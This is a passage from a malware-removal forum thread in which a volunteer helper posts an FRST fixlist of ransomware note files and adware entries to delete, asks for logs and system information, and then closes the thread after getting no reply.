2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.URL
2015-02-20 15:37 - 2015-02-20 15:37 - 00000480 ____H () C:\Documents and Settings\michelle coe\Application Data\麽鎒駓覜
2015-02-24 23:11 - 2014-09-20 15:42 - 00000000 ____D () C:\Program Files\SearchProtect
2015-02-20 15:44 - 2015-02-20 15:44 - 0008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 0045665 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.PNG
2015-02-20 15:44 - 2015-02-20 15:44 - 0004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 0000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL
C:\Documents and Settings\michelle coe\Local Settings\temp\sysrestore.exe
CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{043AC599-453E-4C44-82B0-6793DE8983C0}\InprocServer32 -> C:\Documents and Settings\All Users\Application Data\{8CCDBBA6-E8EE-4844-9F07-469DCB5F2C87}\secproc. (the data entry has 11 more characters).
Task: C:\WINDOWS\Tasks\PC Performer Scheduled Scan.job => C:\Program Files\PC Performer\PCPerformer.exe <==== ATTENTION
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

System Summary Information

--------------------
  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • System Summary Information

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:36 PM

Posted 21 March 2015 - 07:44 AM

Greetings,

===================================================

3 Day Bump

It has been more than 3 days since my last post.
  • Do you still need help with this?
  • If after 48hrs you have not replied to this thread then it will have to be closed.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:36 PM

Posted 23 March 2015 - 10:38 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users